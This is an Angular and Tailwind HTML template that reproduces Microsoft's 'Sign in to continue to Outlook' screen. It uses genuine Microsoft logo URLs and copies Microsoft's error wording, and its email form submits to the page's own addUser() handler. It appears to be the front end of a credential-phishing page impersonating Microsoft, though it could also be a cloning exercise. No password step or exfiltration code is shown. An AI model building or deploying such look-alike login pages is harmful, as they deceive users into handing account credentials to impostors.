
<div class="flex flex-col justify-center items-center h-screen bg-gradient-to-br from-[rgba(241,101,0,0.174)] via-[rgba(223,132,142,0.160)] via-[rgba(86,161,209,0.182)] via-[rgba(47,212,157,0.283)] to-[rgba(243,255,159,0.188)] to-[rgba(237,189,28,0.204)]">
    <div class="w-full p-6 -mt-20">
        <img class="max-w-[256px] max-h-[36px] mx-auto" src="https://aadcdn.msauth.net/shared/1.0/content/images/applogos/53_7a3c80bf9694448bac31a9589d2e9e92.png" alt="Background Logo">
    </div>
    
    <div class="bg-white p-11 shadow-lg max-w-[440px] w-full mt-2 border border-black border-opacity-10"> 
        <div class="mb-3">
            <img class="align-middle border-0" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" alt="Microsoft Logo">
        </div>
        
        <div>
            <h2 class="text-2xl font-semibold">Sign in</h2>
            <h6 class="text-sm mb-4">to continue to Outlook</h6>
            <!-- <p class="text-red-500 text-xs italic" [hidden]="!isControlInvalid('email')">Introduce un email válida</p> -->
            <div *ngIf="showErrorMessage" class="mt-2">
                <p class="text-red-600 text-base">
                    We couldn't find an account with that username. Try another, or  
                  <a href="#" class="text-[#0078d4] hover:text-[#005a9e] no-underline"> get a new Microsoft account</a>.
                </p>
            </div>

            <form [formGroup]="login" (ngSubmit)="addUser()">
                <div class="mb-4">
                    <input type="email" name="email" placeholder="Email, phone, or Skype" required class="w-full border-b border-gray-600 
                    focus:outline-none focus:border-b-2 focus:border-gray-600 placeholder:text-gray-600 form-control" 
                    [ngClass]="{'border-red-600 focus:border-red-600': showErrorMessage, 'border-gray-600 focus:border-gray-600': !showErrorMessage}"
                    id="email" formControlName="email">

                </div>                    
                <div class="mb-4">
                    <p class="text-xs mb-3">No account? <a href="#" class="text-[#0078d4] hover:text-[#005a9e] no-underline text-xs">Create one!</a></p>
                    <a href="#" class="text-[#0078d4] hover:text-[#005a9e] no-underline text-xs">Can't access your account?</a>
                </div>
                                       
                <div class="flex justify-end">
                    <button type="submit" class="bg-[#0067b8] text-white text-sm px-3 py-1.5 w-28 text-center hover:bg-[#005a9e]
                     transition-colors cursor-pointer duration-1000">Next</button>
                     
                </div>
            </form>
        </div>
        
    </div>
</div>

